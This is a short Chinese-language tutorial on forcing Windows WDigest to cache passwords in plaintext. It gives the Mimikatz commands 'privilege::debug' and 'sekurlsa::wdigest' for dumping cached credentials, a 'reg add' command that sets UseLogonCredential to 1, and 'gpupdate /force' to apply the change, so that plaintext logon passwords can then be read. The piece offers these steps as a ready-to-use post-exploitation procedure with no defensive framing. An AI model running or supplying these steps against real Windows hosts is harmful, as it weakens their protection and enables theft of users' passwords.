强制 WDigest明文存储

WDigest是一种摘要身份验证,它是一种质询/响应协议,主要在 Windows Server 2003 中用于 LDAP 和基于 Web 的身份验证。它利用超文本传输协议 (HTTP) 和简单身份验证安全层 (SASL) 交换进行身份验证。

WDigest会缓存用户的密码或哈希值。从 Windows 8.1 和 Windows Server 2012 R2 开始,WDigest的缓存功能默认被禁用,需要手动启用。

首先,我们需要查看 Windows主机是否启用WDigest,在Mimikatz中输入以下命令查看:

privilege::debug
sekurlsa::wdigest

可以看到Password只为null,说明没有启用。

我们可以在cmd的终端中执行以下命令以激活WDigest:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

然后输入以下命令强制更新策略:

gpupdate /force

最后,启用一个新的终端并输入以下命令即可查看到明文凭据:

privilege::debug
sekurlsa::wdigest